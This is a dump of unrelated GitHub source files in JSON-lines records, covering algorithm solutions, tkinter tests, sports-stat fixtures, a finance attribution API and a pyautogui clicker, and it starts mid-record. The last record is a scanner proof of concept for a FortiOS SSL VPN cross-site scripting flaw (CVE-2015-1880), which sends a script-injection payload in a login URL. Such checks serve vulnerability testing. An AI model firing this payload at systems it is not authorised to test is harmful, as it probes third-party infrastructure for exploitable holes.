\"-\")\n","repo_name":"RevinderDev/code-wars","sub_path":"python/3kyu/binomial_expansion.py","file_name":"binomial_expansion.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42568259437","text":"__title__ = \"pesp\"\n__version__ = \"0.1.7\"\n__license__ = \"MIT\"\n__description__ = \"Python encapsulating security payload server.\"\n__keywords__ = \"ike esp ip tcp udp\"\n__author__ = \"Qian Wenjie\"\n__email__ = \"qianwenjie@gmail.com\"\n__url__ = \"https://github.com/qwj/python-esp\"\n\n__all__ = ['__title__', '__version__', '__description__', '__url__']\n","repo_name":"leonliu315/python-esp","sub_path":"pesp/__doc__.py","file_name":"__doc__.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"45533459884","text":"import unittest\nimport unittest\nfrom collections import defaultdict\n\nimport tkinter as tk\nfrom src.manager_commands import Setting\nfrom tkinter.ttk import Notebook, Frame, Button\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_modify_project_config(self):\n Setting('template').execute()\n\n def test_paned_window(self):\n pw = tk.PanedWindow(orient='vertical', showhandle=True, sashrelief='sunken')\n pw.pack(fill='both', expand=1)\n\n top = tk.Label(pw, text='top label', bg='red')\n bottom = tk.Label(pw, text='bottom label', bg='green')\n\n pw.add(top)\n pw.add(bottom)\n\n pw.mainloop()\n\n def test_notebook(self):\n nb = Notebook(padding=10)\n\n frm1 = Frame(nb)\n frm2 = Frame(nb)\n\n btn1 = Button(frm1, text='btn1')\n btn2 = Button(frm2, text='btn2')\n btn1.pack()\n btn2.pack()\n\n nb.add(frm1, text='frm1')\n nb.add(frm2, text='frm2')\n nb.pack(fill='both', expand=1)\n nb.mainloop()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ArchShun/AutoCadHelper","sub_path":"test/test_manager_commands.py","file_name":"test_manager_commands.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21083724464","text":"import sys\nimport heapq\n\nfastin = sys.stdin.readline\nINF = sys.maxsize\n\nv, e = map(int, fastin().split())\nk = int(fastin())\n\nw = [INF] * (v+1)\nheap = []\ngraph = [[] for _ in range(v+1)]\n\n\ndef dij(start):\n w[start] = 0\n heapq.heappush(heap, (0, start))\n \n while heap:\n weight, now = heapq.heappop(heap)\n if w[now] < weight: continue\n \n for wei, next in graph[now]:\n next_wei = wei + weight\n if next_wei < w[next]:\n w[next] = next_wei\n \n heapq.heappush(heap, (next_wei, next))\n \n \nfor _ in range(e):\n U, V, W = map(int, fastin().split())\n graph[U].append((W, V))\n \ndij(k)\nfor i in range(1, v+1):\n print(\"INF\" if w[i] == INF else w[i])","repo_name":"SquirtlesAlgorithmStudy/squirtlesAlgorithmStudy-S345","sub_path":"민정/20220511/boj1753.py","file_name":"boj1753.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"11171991685","text":"from datetime import datetime\nfrom collections import namedtuple\nfrom random import randrange\n\nfrom data_models.penalty import Penalty\nfrom data_models.goal import Goal\nfrom data_models.game import Game\nfrom data_models.team import Team\nfrom data_models.skater_stat import SkaterStat\nfrom data_models.goalie_stat import GoalieStat\nfrom data_loaders.test_player_loader import TEAMS, 
create_player\n\n\nGameData = namedtuple('GameData', 'id, home, away')\nGAMES = [\n GameData(id=21, home=TEAMS[0], away=TEAMS[1]),\n GameData(id=22, home=TEAMS[2], away=TEAMS[3]),\n GameData(id=23, home=TEAMS[4], away=TEAMS[7]),\n GameData(id=24, home=TEAMS[4], away=TEAMS[5]),\n GameData(id=25, home=TEAMS[6], away=TEAMS[7]),\n GameData(id=26, home=TEAMS[8], away=TEAMS[0])\n]\n\n\ndef _get_skater_stat(game, player):\n st = SkaterStat()\n st.game = game\n st.date = game.date\n st.team = player.current_team\n st.player = player\n st.assists = randrange(0, 3)\n st.goals = randrange(0, 3)\n st.shots = randrange(0, 8)\n st.hits = randrange(0, 5)\n st.pp_goals = randrange(0, 2)\n st.pp_assists = randrange(0, 2)\n st.penalty_minutes = randrange(0, 4)\n st.face_off_wins = randrange(0, 4)\n st.face_off_taken = st.face_off_wins + randrange(2, 6)\n st.takeaways = randrange(0, 3)\n st.giveaways = randrange(0, 3)\n st.sh_goals = randrange(0, 2)\n st.sh_assists = randrange(0, 2)\n st.blocked = randrange(0, 5)\n st.plus_minus = randrange(-3, 4)\n st.even_toi = randrange(0, 600)\n st.pp_toi = randrange(0, 120)\n st.sh_toi = randrange(0, 120)\n st.toi = st.even_toi + st.pp_toi + st.sh_toi\n return st\n\n\ndef _get_goalie_stat(game, player):\n st = GoalieStat()\n st.game = game\n st.date = game.date\n st.team = player.current_team\n st.player = player\n st.toi = 3600\n st.assists = 0\n st.goals = 0\n st.penalty_minutes = randrange(0, 3)\n st.pp_saves = randrange(0, 30)\n st.sh_saves = randrange(0, 5)\n st.even_saves = randrange(0, 5)\n st.saves = st.even_saves + st.pp_saves + st.sh_saves\n st.sh_shots_against = st.sh_saves + randrange(0, 2)\n st.even_shots_against = st.even_saves + randrange(0, 3)\n st.pp_shots_against = st.pp_saves + randrange(0, 2)\n st.shots = st.even_shots_against + st.sh_shots_against + st.pp_shots_against\n st.decision = 'winner' if randrange(0, 2) == 1 else 'loser'\n return st\n\n\ndef _create_game_stat(link):\n date = datetime(2016, 4, 30).date()\n home = Team()\n home.id = GAMES[link].home.id\n away = Team()\n away.id = GAMES[link].away.id\n\n game = Game()\n game.id = GAMES[link].id\n game.date = date\n game.home = Game.TeamStat()\n game.home.team = home\n game.home.goals_period1 = randrange(0, 3)\n game.home.goals_period2 = randrange(0, 3)\n game.home.goals_period3 = randrange(0, 3)\n game.home.goals = game.home.goals_period1 + game.home.goals_period2 + game.home.goals_period3\n game.home.shots = randrange(10, 40)\n game.home.pp_goals = randrange(0, 2)\n game.home.pp_opportunities = game.home.pp_goals + randrange(0, 3)\n game.home.face_off_wins = randrange(10, 30)\n game.home.blocked = randrange(5, 15)\n game.home.hits = randrange(5, 15)\n game.home.penalty_minutes = randrange(0, 20)\n game.away = Game.TeamStat()\n game.away.team = away\n game.away.goals_period1 = randrange(0, 3)\n game.away.goals_period2 = randrange(0, 3)\n game.away.goals_period3 = randrange(0, 3)\n game.away.goals = game.away.goals_period1 + game.away.goals_period2 + game.away.goals_period3\n game.away.shots = randrange(10, 40)\n game.away.pp_goals = randrange(0, 2)\n game.away.pp_opportunities = game.away.pp_goals + randrange(0, 3)\n game.away.face_off_wins = randrange(10, 30)\n game.away.blocked = randrange(5, 15)\n game.away.hits = randrange(5, 15)\n game.away.penalty_minutes = randrange(0, 20)\n game.is_regular = True\n game.win_type = 'regular'\n if game.home.goals == game.away.goals:\n game.home.goals += 1\n game.home.goals_period3 += 1\n game.face_off_taken = game.home.face_off_wins + 
game.away.face_off_wins\n    return game\n\n\ndef get_games_list(start, end):\n    return list(range(0, 6))\n\n\ndef get_game_info(link):\n    goals = []\n    penalties = []\n    skater_stats = []\n    goalie_stats = []\n\n    skaters = []\n    goalies = []\n\n    home = Team()\n    home.id = GAMES[link].home.id\n    away = Team()\n    away.id = GAMES[link].away.id\n\n    for i in GAMES[link].home.players:\n        p = create_player(i)\n        skaters.append(p)\n    for i in GAMES[link].home.goalies:\n        p = create_player(i)\n        goalies.append(p)\n\n    for i in GAMES[link].away.players:\n        p = create_player(i)\n        skaters.append(p)\n    for i in GAMES[link].away.goalies:\n        p = create_player(i)\n        goalies.append(p)\n\n    game = _create_game_stat(link)\n\n    for pl in skaters:\n        skater_stats.append(_get_skater_stat(game, pl))\n\n    for pl in goalies:\n        goalie_stats.append(_get_goalie_stat(game, pl))\n\n    for i in range(0, 10):\n        n = randrange(0, 20)\n        pl = skaters[n]\n        goal = Goal()\n        goal.date = game.date\n        goal.game = game\n        goal.team = pl.current_team\n        goal.scorer = pl\n        goal.strength = 'even'\n        goal.coord_x = randrange(-99, 100)\n        goal.coord_y = randrange(-42, 43)\n        goals.append(goal)\n\n    for i in range(0, 10):\n        n = randrange(0, 20)\n        pl = skaters[n]\n        pen = Penalty()\n        pen.date = game.date\n        pen.game = game\n        pen.team = pl.current_team\n        pen.penalty_on = pl\n        pen.penalty_minutes = 2\n        pen.coord_x = randrange(-99, 100)\n        pen.coord_y = randrange(-42, 43)\n        penalties.append(pen)\n\n    return game, skater_stats, goalie_stats, penalties, goals\n","repo_name":"TimurShaykhiev/hockeystats","sub_path":"server/data_loaders/test_game_loader.py","file_name":"test_game_loader.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"2495385993","text":"import sys\nimport os\n\npath = os.path.dirname(os.path.dirname(__file__))\nsys.path.append(path)\ndb_path = os.path.join(path, \"database\")\n\n\nfrom foo.public_class import Public\nfrom foo.teacher_class import Teacher\nfrom foo.student_class import Student\nfrom conf.settings import database_name\nfrom log.log_print import log_print\n\n\nclass Course(object):\n    def __init__(self, course_name, course_tuition, course_cycle):\n        self.course_name = course_name\n        self.course_tuition = course_tuition\n        self.course_cycle = course_cycle\n\n\nclass Classroom(object):\n    def __init__(self, classroom_name, classroom_course, classroom_teacher):\n        self.classroom_name = classroom_name\n        self.classroom_course = classroom_course\n        self.classroom_teacher = classroom_teacher\n\n\nclass School(Public):\n    def __init__(self):\n        Public.__init__(self)\n\n    def create_school(self):\n        \"\"\"\n        Create a school\n        :return:\n        \"\"\"\n        school_name = input(\"school name:\")\n        school_place = input(\"school place:\")\n        palace_dict = {\"school place\": school_place}\n        if not Public.loads_data(self, \"school\"):\n            school_dict = {\"school\": {school_name: palace_dict}}  # plain nested dict; a set literal {palace_dict} here would raise TypeError\n            Public.dumps(self, os.path.join(db_path, database_name[\"school\"]), school_dict)\n        else:\n            data_school_dict = Public.loads_data(self, \"school\")\n            print(data_school_dict)\n            data_school_dict[\"school\"].setdefault(school_name, palace_dict)\n            Public.dumps(self, os.path.join(db_path, database_name[\"school\"]), data_school_dict)\n        log_print(\"Created school %s successfully\" % school_name)\n\n    def create_course(self):\n        \"\"\"\n        Create a course\n        :return:\n        \"\"\"\n        course_name = input(\"course name:\")\n        course_tuition = input(\"course tuition:\")\n        course_cycle = input(\"course cycle:\")\n        c = Course(course_name, course_tuition, course_cycle)\n        course_dict = {course_name: {}}\n        course_dict[course_name][\"course tuition\"] = c.course_tuition\n        course_dict[course_name][\"course cycle\"] = c.course_cycle\n        if not Public.loads_data(self, \"course\"):\n            Public.dumps(self, os.path.join(db_path, database_name[\"course\"]), course_dict)\n            log_print(\"Created table %s successfully\" % database_name[\"course\"])\n            log_print(\"Created course %s successfully\" % course_name)\n        else:\n            data_course_dict = Public.loads_data(self, \"course\")\n            data_course_dict.setdefault(course_name, course_dict[course_name])\n            Public.dumps(self, os.path.join(db_path, database_name[\"course\"]), data_course_dict)\n            log_print(\"Created course %s successfully\" % course_name)\n\n    def create_classroom(self):\n        \"\"\"\n        Create a class\n        :return:\n        \"\"\"\n        classroom_name = input(\"classroom_name:\")\n        classroom_course = input(\"classroom_course:\")\n        classroom_teacher = input(\"classroom_teacher:\")\n        classroom_dict = {classroom_name: {}}\n        c = Classroom(classroom_name, classroom_course, classroom_teacher)\n        classroom_dict[classroom_name][\"classroom course\"] = c.classroom_course\n        classroom_dict[classroom_name][\"classroom teacher\"] = c.classroom_teacher\n        if not Public.loads_data(self, \"classroom\"):\n            Public.dumps(self, os.path.join(db_path, database_name[\"classroom\"]), classroom_dict)\n            log_print(\"Created table %s successfully\" % database_name[\"classroom\"])\n            log_print(\"Created class %s successfully\" % classroom_name)\n        else:\n            data_classroom_dict = Public.loads_data(self, \"classroom\")\n            data_classroom_dict.setdefault(classroom_name, classroom_dict[classroom_name])\n            Public.dumps(self, os.path.join(db_path, database_name[\"classroom\"]), data_classroom_dict)\n            log_print(\"Created class %s successfully\" % classroom_name)\n\n\n    def create_teacher(self):\n        \"\"\"\n        Create a teacher\n        :return:\n        \"\"\"\n\n        teacher_name = input(\"teacher_name:\")\n        teacher_salary = input(\"teacher_salary:\")\n        teacher_school = input(\"teacher_school:\")\n        teacher_dict = {teacher_name: {}}\n        t1 = Teacher(teacher_name, teacher_salary, teacher_school)\n        teacher_dict[teacher_name][\"teacher salary\"] = t1.teacher_salary\n        teacher_dict[teacher_name][\"teacher school\"] = t1.teacher_school\n        if not Public.loads_data(self, \"teacher\"):\n            Public.dumps(self, os.path.join(db_path, database_name[\"teacher\"]), teacher_dict)\n            log_print(\"Created table %s successfully\" % database_name[\"teacher\"])\n            log_print(\"Created teacher %s successfully\" % teacher_name)\n        else:\n            data_teacher_dict = Public.loads_data(self, \"teacher\")\n            data_teacher_dict.setdefault(teacher_name, teacher_dict[teacher_name])\n            Public.dumps(self, os.path.join(db_path, database_name[\"teacher\"]), data_teacher_dict)\n            log_print(\"Created teacher %s successfully\" % teacher_name)\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n    s = School()\n    s.create_school()\n    s.create_teacher()\n    # s.create_student()  # School defines no create_student(); student creation lives on the imported Student class\n    s.create_classroom()\n    s.create_course()","repo_name":"keepAmbition/python_code","sub_path":"04.course/foo/school_class.py","file_name":"school_class.py","file_ext":"py","file_size_in_byte":5141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
{"seq_id":"19251363715","text":"from flask_restful import Api, Resource, marshal_with, reqparse, fields\nimport pandas as pd\n\nfrom . 
import rest\nfrom ...models import Brinson, db\n\n\napi = Api(rest, prefix=\"/attr\")\n\n\n@api.resource(\"/\")\nclass BrinsonViews(Resource):\n source_fields = {\n \"id\": fields.Integer,\n \"windcode\": fields.String,\n \"industry_code\": fields.String,\n \"industry_name\": fields.String,\n \"q1\": fields.Float,\n \"q2\": fields.Float,\n \"q3\": fields.Float,\n \"q4\": fields.Float,\n \"raa\": fields.Float,\n \"rss\": fields.Float,\n \"rin\": fields.Float,\n \"rto\": fields.Float,\n \"freq\": fields.String,\n \"benchmark\": fields.String,\n \"rpt_date\": fields.String\n }\n\n @marshal_with(source_fields)\n def get(self):\n args = BrinsonViews.arg_parser()\n if args is None:\n return\n windcode = args.get(\"windcode\")\n benchmark = args.get(\"benchmark\")\n freq = args.get(\"freq\")\n rpt_date = args.get(\"rpt_date\")\n if freq == \"S\":\n ret = Brinson.query.filter(\n Brinson.rpt_date == rpt_date, Brinson.freq == freq, Brinson.windcode == windcode, Brinson.benchmark == benchmark\n ).order_by(Brinson.industry_code).all()\n else:\n ret = multi_period(windcode, benchmark, rpt_date)\n print(ret)\n return ret\n\n @staticmethod\n def arg_parser():\n parser = reqparse.RequestParser()\n parser.add_argument(\"windcode\", type=str)\n parser.add_argument(\"benchmark\", type=str)\n parser.add_argument(\"freq\", type=str)\n parser.add_argument(\"rpt_date\", type=str)\n args = parser.parse_args()\n windcode = args.get(\"windcode\")\n is_in = Brinson.query.with_entities(Brinson.windcode).filter(Brinson.windcode == windcode).first()\n if not is_in:\n return\n benchmark = args.get(\"benchmark\")\n if benchmark is None:\n benchmark = \"000300.SH\"\n\n rpt_date = args.get(\"rpt_date\")\n if rpt_date is None:\n rpt_date = Brinson.query.with_entities(Brinson.rpt_date).filter(\n Brinson.windcode == windcode\n ).order_by(Brinson.rpt_date.desc()).first()[0]\n freq = \"S\"\n else:\n rpt_date = rpt_date.split(\",\")\n if len(rpt_date) == 1:\n rpt_date = rpt_date[0]\n freq = \"S\"\n else:\n freq = \"M\"\n return {\"windcode\": windcode, \"benchmark\": benchmark, \"freq\": freq, \"rpt_date\": rpt_date}\n\n\n@api.resource(\"/rpt_date\")\nclass RptDateViews(Resource):\n def get(self):\n parse = reqparse.RequestParser()\n parse.add_argument(\"windcode\", type=str)\n args = parse.parse_args()\n windcode = args.get(\"windcode\")\n is_in = Brinson.query.with_entities(Brinson.windcode).filter(Brinson.windcode == windcode).first()\n if not is_in:\n return\n dates = Brinson.query.with_entities(db.func.distinct(Brinson.rpt_date)).filter(\n Brinson.windcode == windcode, Brinson.freq == \"S\", Brinson.benchmark == \"000300.SH\"\n ).order_by(Brinson.rpt_date.desc()).all()\n dates = [x[0].strftime(\"%Y-%m-%d\") for x in dates]\n benchs = Brinson.query.with_entities(db.func.distinct(Brinson.benchmark)).filter(\n Brinson.rpt_date == dates[0], Brinson.windcode == windcode, Brinson.freq == \"S\"\n ).all()\n benchs = [x[0] for x in benchs]\n return {\"date\": dates, \"benchmark\": benchs}\n\n\ndef multi_period(windcode, benchmark, rpt_date: list):\n \"\"\"多期brinson模型\"\"\"\n b = Brinson\n data = b.query.with_entities(\n b.windcode, b.industry_name, b.industry_code, b.q1, b.q2, b.q3, b.q4, b.rpt_date, b.benchmark\n ).filter(\n b.windcode == windcode, b.freq == \"S\", b.benchmark == benchmark,\n b.rpt_date.between(rpt_date[0], rpt_date[-1])\n ).all()\n data = pd.DataFrame(data).fillna(0)\n data = data.set_index(\"industry_code\")\n for k in [\"q1\", \"q2\", \"q3\", \"q4\"]:\n data[k] = data[k] / 100 + 1\n rpts = 
sorted(list(set(data[\"rpt_date\"])), reverse=True)\n init = data[data[\"rpt_date\"] == rpts[0]]\n\n for rpt in rpts[1:]:\n other = data[data[\"rpt_date\"] == rpt]\n for k in [\"q1\", \"q2\", \"q3\", \"q4\"]:\n init[k] *= other[k]\n for k in [\"q1\", \"q2\", \"q3\", \"q4\"]:\n init[k] = (init[k] - 1)*100\n\n init = init.reset_index()\n init[\"rpt_date\"] = init[\"rpt_date\"].apply(lambda x: x.strftime(\"%Y-%m-%d\"))\n\n init[\"raa\"] = init[\"q2\"] - init[\"q1\"]\n init['rss'] = init[\"q3\"] - init[\"q1\"]\n init[\"rin\"] = init[\"q4\"] - init[\"q3\"] - init[\"q2\"] + init[\"q1\"]\n init[\"rto\"] = init[\"q4\"] - init[\"q1\"]\n return init.to_dict(orient=\"records\")\n\n\n@api.resource(\"/test\")\nclass MultiPeriodViews(Resource):\n def get(self):\n return multi_period()\n","repo_name":"PengchuanC/fund_back_v2","sub_path":"back_server/routes/v1/attributionviews.py","file_name":"attributionviews.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"32957543039","text":"import win32gui\nimport cv2\nimport numpy as np\nimport pyautogui\nimport time\nfrom PIL import ImageGrab \n\nWINDOW_TITLE = \"海之乐章-重启 V1.60.01A (Build:Apr 4 2023,10:50:20)\"\nTARGET_IMAGES = [\n (\"1.png\", 1, 0,0),\n (\"2.png\", 1, 0,0),\n (\"3.png\", 4, 0,0),\n (\"4.png\", 1, 0,0),\n (\"1.png\", 1, 0,0),\n (\"5.png\", 1, 0,0),\n (\"6.png\", 1, -70,12),\n (\"7.png\", 1, 0,0),\n]\nCONFIDENCE_LEVEL = 0.6\nCLICK_INTERVAL = 1\nCLICK_DURATION = 0.2\n\n\ndef capture_window(window_title):\n hwnd = win32gui.FindWindow(None, window_title)\n rect = win32gui.GetWindowRect(hwnd)\n return rect\n\n\ndef find_target(rect, target, click_times=1, deviation=0,waiting_time=0):\n time.sleep(waiting_time)\n if isinstance(target, np.ndarray):\n image = target\n else:\n image = cv2.imread(target, cv2.IMREAD_COLOR)\n\n result = pyautogui.locateCenterOnScreen(image, confidence=CONFIDENCE_LEVEL, region=rect)\n if result is not None:\n try:\n pyautogui.click(\n x=result.x + deviation,\n y=result.y + deviation,\n clicks=click_times,\n interval=CLICK_INTERVAL,\n duration=CLICK_DURATION,\n button=\"left\",\n )\n except pyautogui.FailSafeException as e:\n print(e)\n else:\n print(f\"未找到匹配图片 {target},0.1秒后重试\")\n time.sleep(0.1)\n\nfrom PIL import ImageGrab\n\n\ndef find_pixel_location(color, region=None):\n im = ImageGrab.grab()\n width, height = im.size\n if region is None:\n region = (0, 0, width, height)\n for x in range(region[0], region[2]):\n for y in range(region[1], region[3]):\n if im.getpixel((x, y)) == color:\n return (x, y)\n return None\n\n\nif __name__ == \"__main__\":\n # with ImageGrab.grab() as _:\n # window_rect = capture_window(WINDOW_TITLE)\n color=(185,227,117)\n regin=find_pixel_location(color)\n if regin is not None:\n pyautogui.moveTo(regin)\n pyautogui.click()\n else:\n print('未找到') \n # for target_image, click_times, deviation,waiting_time in TARGET_IMAGES:\n # find_target(window_rect, target_image, click_times, deviation , waiting_time)\n","repo_name":"chongwen2012/sea","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26836722485","text":"import cv2\r\nimport os\r\nimport sys\r\nsys.path.append('../packages/rectify/')\r\nimport imutils as imu\r\nfrom right import remedy\r\nfrom rectify_hough import correct_skew2\r\n\r\n\r\ndef hough_angle(imageDir,imageSaveDir):\r\n imagePathList = 
os.listdir(imageDir)\r\n    #imagePathList=['120190703153927345.jpg']\r\n\r\n    for i in range(0, len(imagePathList)):\r\n        imagePath = os.path.join(imageDir, imagePathList[i])\r\n        print(imagePath)\r\n        img = cv2.imread(imagePath)\r\n        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n        rotated, angle = correct_skew2(img, gray)\r\n        corrected = remedy(rotated)\r\n        # imu.imshow_(corrected)\r\n        cv2.imwrite(os.path.join(imageSaveDir,imagePathList[i]),corrected)\r\n\r\n\r\ndef rectify(img):\r\n    if isinstance(img, str):\r\n        img = cv2.imread(img)\r\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n    rotated, angle = correct_skew2(img, gray)\r\n    corrected = remedy(rotated)\r\n    return corrected\r\n\r\nif __name__ == '__main__':\r\n    # imageDir='F:/exam_dataset/waibu/waibu-liangdiangeili'\r\n    imageDir = '../../math'\r\n\r\n    # imageSaveDir = 'F:/exam/result/hough_angle/abc'\r\n    imageSaveDir = '../../math-adjust'\r\n\r\n    hough_angle(imageDir,imageSaveDir)","repo_name":"Tegrisco/testpaper-stage2","sub_path":"packages/rectify/hough_angle.py","file_name":"hough_angle.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"8646743431","text":"\"\"\"\n    This type of algorithm has two obligatory functions:\n\n        *initial_allocation*: invoked at the start of the simulation\n\n        *run* invoked according to the assigned temporal distribution.\n\n\"\"\"\n\nfrom yafs.placement import Placement\n\nclass CloudPlacement(Placement):\n    \"\"\"\n    This implementation locates the services of the application in the cheapest cloud regardless of where the sources or sinks are located.\n\n    It only runs once, in the initialization.\n\n    \"\"\"\n    def initial_allocation(self, sim, app_name):\n        #We find the node ID/resource\n        value = {\"mytag\": \"cloud\"} # or whatever tag\n\n        id_cluster = sim.topology.find_IDs(value)\n        app = sim.apps[app_name]\n        services = app.services\n\n        for module in services:\n            if module in self.scaleServices:\n                for rep in range(0, self.scaleServices[module]):\n                    idDES = sim.deploy_module(app_name,module,services[module],id_cluster)\n\n    #end function\n\n\n\n\n","repo_name":"acsicuib/YAFS","sub_path":"examples/Tutorial/simplePlacement.py","file_name":"simplePlacement.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"78"}
{"seq_id":"16862923342","text":"# Question: https://leetcode.com/problems/container-with-most-water/\n\n# Solution:\nclass Solution:\n    def maxArea(self, height: List[int]) -> int:\n        # Function to calculate area: Minimum height, max width\n        def getArea(left, right):\n            x = abs(right-left)\n            y = min(height[left], height[right])\n            return x*y\n        \n        n = len(height)\n        left, right = 0, n-1\n        area = 0\n        while left < right:\n            area = max(area, getArea(left, right))\n            if height[left] > height[right]:\n                right -= 1\n            else:\n                left += 1\n        return area\n\n# Verdict:\n# Runtime: 740 ms, faster than 66.18% of Python3 online submissions for Container With Most Water.\n# Memory Usage: 27.6 MB, less than 22.10% of Python3 online submissions for Container With Most Water.\n","repo_name":"Dexterzprotege/LeetCode-Blind75","sub_path":"04ContainerWithMostWater.py","file_name":"04ContainerWithMostWater.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"23588321461","text":"# Install this first: pip install pyautogui\n# X = X^2 (positions 3-6 are taken), so the square must always have 8 digits\n# 4-digit seed\n\nimport pyautogui\nfrom datetime import datetime\n\ndef get_mouse_seed():\n    # Get the current mouse position\n    x, y = pyautogui.position()\n\n    # Turn the x and y coordinates into an integer using the hash() function\n    seed = hash((x, y))\n\n    # Return the seed generated from the mouse coordinates\n    return seed\n\ndef validar_semilla(semilla): # Validate the seed size\n    if semilla <= 9999:\n        return semilla\n    else:\n        semilla_acortada = str(semilla)[:4]\n        return int(semilla_acortada)\n\n\ndef validar_numAleatorio(num_aleatorio):\n    x = str(num_aleatorio)\n    while len(x) < 8: \n        x = \"1\" + x \n    return x\n\n\ndef von_Neumann(semilla, cantidad):\n    lista = []\n    x = semilla\n    for i in range(cantidad):\n        x = x ** 2\n        valor_ale= validar_numAleatorio(x)\n        x = int(valor_ale[2:6])\n        lista.append(x)\n    return lista\n\n\nsemilla = get_mouse_seed()\n#semilla = datetime.now().timestamp()\ncantidad = int(input(\"Enter how many pseudo-random numbers you need: \"))\nsemilla = validar_semilla(semilla)\ngenerator = von_Neumann(semilla, cantidad)\n\nprint(\"Table of generated pseudo-random numbers:\")\nprint(\"------------------------------\")\nprint(\"|  Index  |   Value   |\")\nprint(\"------------------------------\")\nfor i in range(len(generator)):\n    print(f\"| {i+1}  | {generator[i]}  |\")\nprint(\"------------------------------\")\n","repo_name":"sebadiko/NumerosPseoudoaleatorios","sub_path":"metodoVN.py","file_name":"metodoVN.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"14349500455","text":"import sys\nimport os\nsys.path.insert(0, os.path.join(\n    os.path.dirname(os.path.realpath(__file__)), '..'))\n\nfrom crnpy.crn import CRN, from_react_strings\n\nfrom simulation import simulate, plot_simulation\n\n__author__ = \"Elisa Tonello\"\n__copyright__ = \"Copyright (c) 2016, Elisa Tonello\"\n__license__ = \"BSD\"\n__version__ = \"0.0.1\"\n\n\nif __name__ == \"__main__\":\n    # Simulation of one-substrate enzyme kinetics,\n    # before and after removal of the intermediate via qss.\n\n    crn = from_react_strings(['s + e (k_1)<->(k1) es', 'es ->(k2) p + e'])\n\n    start_t, end_t, incr = 0, 1, 0.01\n    initial = {'s': 5, 'e': 3, 'es': 0, 'p': 0}\n    params = {'comp': 1, 'k1': 15, 'k_1': 10, 'k2': 6}\n\n    colors = {'s': 'darkgreen', 'e': 'red', 'es': 'yellow', 'p': 'blue'}\n\n    data, t = simulate(crn, params, initial, start_t, end_t, incr)\n    title = \"One-substrate enzyme kinetics\\n $k_{1} = %s$, $k_{-1} = %s$, $k_{2} = %s$\"%\\\n            (params['k1'], params['k_1'], params['k2'])\n    plot_simulation(\"one-sub_enzyme_plt.png\", data, t, colors, title)\n\n    crn.qss('es')\n\n    data, t = simulate(crn, params, initial, start_t, end_t, incr)\n    title = \"One-substrate enzyme kinetics, after qss reduction\\n $k_{1} = %s$, $k_{-1} = %s$, $k_{2} = %s$\"%\\\n            (params['k1'], params['k_1'], params['k2'])\n    plot_simulation(\"one-sub_enzyme_reduced_plt.png\", data, t, colors, title)\n","repo_name":"etonello/crnpy","sub_path":"examples/simulation_one-sub_enzyme.py","file_name":"simulation_one-sub_enzyme.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"}
{"seq_id":"656598767","text":"import requests\n\n\n# Vuln Base Info\ndef info():\n    return {\n        \"author\": \"cckuailong\",\n        \"name\": '''XSS in Fortigates SSL VPN login 
page''',\n        \"description\": '''Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.''',\n        \"severity\": \"medium\",\n        \"references\": [\n            \"https://nvd.nist.gov/vuln/detail/CVE-2015-1880\", \n            \"https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page\"\n        ],\n        \"classification\": {\n            \"cvss-metrics\": \"\",\n            \"cvss-score\": \"\",\n            \"cve-id\": \"\",\n            \"cwe-id\": \"\"\n        },\n        \"metadata\":{\n            \"vuln-target\": \"\",\n            \n        },\n        \"tags\": [\"cve\", \"cve2015\", \"xss\", \"fortigates\", \"ssl\"],\n    }\n\n\n# Vendor Fingerprint\ndef fingerprint(url):\n    return True\n\n# Proof of Concept\ndef poc(url):\n    result = {}\n    try:\n        url = format_url(url)\n        path = \"/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en\"\n\n        resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)\n        if resp.status_code == 200 and \"<script>alert('{{randstr}}')</script>\" in resp.text and \"text/html\" in str(resp.headers):\n            result[\"success\"] = True\n            result[\"info\"] = info()\n            result[\"payload\"] = url+path\n\n    except:\n        result[\"success\"] = False\n    \n    return result\n\n\n# Exploit, can be same with poc()\ndef exp(url):\n    return poc(url)\n\n\n# Utils\ndef format_url(url):\n    url = url.strip()\n    if not ( url.startswith('http://') or url.startswith('https://') ):\n        url = 'http://' + url\n    url = url.rstrip('/')\n\n    return 